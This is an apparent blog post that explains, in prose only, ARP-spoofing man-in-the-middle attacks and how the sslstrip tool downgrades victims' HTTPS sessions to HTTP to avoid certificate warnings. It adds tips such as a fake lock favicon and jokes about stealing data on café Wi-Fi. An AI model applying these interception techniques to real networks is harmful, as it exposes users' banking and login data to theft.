Remember the good old days when we would fire up Cain or dsniff and do a man in the middle attack? What was the big problem with this technique? If you said the invalid certificate, you would be right. For those of you not familiar with this, here is the quick and dirty.
Arp being a trusting soul will accept an update from anyone by default. With that in mind we set our computers to tell all of the other computers on the network that we are their default gateway. We do this via an ARP packet. We continue to send these packets out making sure they don't forget that we are in fact their default gateway. Now all of their traffic comes though us. Since we know the real MAC address of the real gateway, we send those packets out as normal. Pretty cool. The user is none the wiser at this point.
Now, Joe User decides to head on over to his bank site which uses HTTPS encryption. When we intercept that packet we terminate that secure connection and establish a new connection from us to the bank. For that brief moment when Joe's packets come to us and we send them off, it is all unencrypted. Very cool. Problem! The certificate we send to Joe for the HTTPS session is signed by us because we do not have the private key of the bank site....yet :)) When Joe's PC sees this incorrect certificate, it throws a warning message saying DON'T GO ON OR YOU WILL BE pWNED! OK it really doesn't say that but you have all seen the warning before.
Most people will click right through that not caring one bit. For those of us that are a little more security conscious though, we stop and investigate. Our plan is now foiled. Game over :(.
Enter sslstrip. This nifty tool makes our game go on. Whats interesting about sslstrip is that no certificate error is sent. It simply redirects you to a http session which your browser doesn't care about HTTPS certificates for these sites. So no more warnings, we can just capture away. If you want to be a little more sly you could send a new favicon.ico on with the packets to Joe that is a picture of a little lock. Looks secure :) muhahah! Very cool tool. MITM is possible again. So I will leave you with a video from pauldotcom showing how this cool tool works. I'm off to $tarbucks to pwn some private information, I mean surf some websites :)
John Strand's Channel showing SSLStrip and more!
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment